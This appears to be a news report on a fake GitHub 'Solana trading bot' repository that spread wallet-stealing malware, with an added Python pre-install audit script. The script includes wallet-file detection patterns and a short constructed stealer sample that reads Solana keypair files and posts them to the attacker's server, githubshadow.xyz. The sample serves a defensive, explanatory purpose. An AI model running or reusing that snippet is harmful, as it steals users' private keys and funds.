Fake GitHub Repository Distributes Malware to Solana Wallet Users
A fake GitHub repository, supposedly offering a Solana trading bot, was used to distribute malware, according to cybersecurity firm SlowMist.
Key Points:

  • Malware targeted Solana wallet users through fake GitHub repository.
  • Funds routed to FixedFloat, lacking robust KYC protocols.
  • No official statements from Solana Foundation or major exchanges.

Malicious GitHub Repository Poses Threat

A malicious GitHub repository claimed to offer a Solana trading bot but instead distributed malware to steal wallet credentials. SlowMist, a cybersecurity firm, investigated and exposed the sophisticated supply chain attack.

Method of Attack

The attacker, operating under the alias zldp2002, used fake GitHub accounts to legitimize the repository, increasing its credibility within the community. This strategy aimed to target Solana wallet users specifically.

Impact on Wallet Security

“Once installed, this package silently scanned for private keys and wallet files on the user’s device and sent them to an attacker-controlled server, githubshadow.xyz.” — SlowMist, Cybersecurity Firm

The breach compromised Solana wallet users’ security, siphoning funds to attacker-controlled addresses. The stolen assets were tracked and confirmed as routed to FixedFloat, a platform known for its inefficient KYC protocols.
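The behaviour SlowMist describes, a package that reads wallet key files and posts them to an outside host, leaves a static fingerprint a defender can look for before running downloaded code. The audit below is an added example, not SlowMist's tooling or the malicious repository's code; the wallet-path heuristics and the two sample source snippets are constructed for illustration, and only the `githubshadow.xyz` host comes from the report above.

```python
"""Pre-install audit for a downloaded trading-bot package (added example)."""
import re
from typing import Dict, List

# Heuristics for wallet key material (assumed; ~/.config/solana/id.json is the
# Solana CLI's default keypair path, the rest are generic wallet-file names).
WALLET_PATTERNS = [
    r"\.config/solana/id\.json",
    r"\bid\.json\b",
    r"wallet\.(json|dat)",
    r"\b(private|secret)[_\s-]?key\b",
]
# Any outbound URL; the captured group is the host the code talks to.
NETWORK_PATTERN = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Attacker-controlled collection server named in SlowMist's report.
KNOWN_BAD_HOSTS = {"githubshadow.xyz"}


def audit_source(text: str) -> Dict[str, object]:
    """Return wallet-file hits, contacted hosts and a verdict for one source file."""
    wallet_hits: List[str] = [p for p in WALLET_PATTERNS if re.search(p, text, re.I)]
    hosts = sorted({m.group(1).lower() for m in NETWORK_PATTERN.finditer(text)})
    known_bad = [h for h in hosts
                 if any(h == b or h.endswith("." + b) for b in KNOWN_BAD_HOSTS)]
    # Block on a known indicator, or on the tell-tale combination of
    # reading key material AND reaching out to the network. Key access
    # without networking is legitimate for a signing bot, so only review it.
    if known_bad or (wallet_hits and hosts):
        verdict = "block"
    elif wallet_hits:
        verdict = "review"
    else:
        verdict = "allow"
    return {"wallet_hits": wallet_hits, "hosts": hosts,
            "known_bad": known_bad, "verdict": verdict}


# Constructed samples: a stealer-like snippet and a harmless price fetch.
MALICIOUS = '''
import os, requests
home = os.path.expanduser("~")
for p in [home + "/.config/solana/id.json", home + "/wallet.json"]:
    if os.path.exists(p):
        requests.post("https://githubshadow.xyz/collect", data=open(p).read())
'''
BENIGN = '''
import requests
quote = requests.get("https://api.example.com/price?symbol=SOL").json()
'''

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(name, audit_source(src))
```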

Limited Market Impact and Historical Context

Despite the theft, the market impact was limited to the individuals who downloaded the compromised code. No broad protocol-level vulnerability affecting Solana or DeFi projects was observed.

Currently, there are no reports of any significant loss in larger market metrics, such as TVL, or noticeable liquidity changes as a result of this breach. SlowMist’s reports focus on individual user-level losses.

Historical analysis shows similar supply chain attacks in the crypto industry, impacting multiple blockchains and user assets. The targeted exploitation underscores ongoing challenges in open-source platform security.
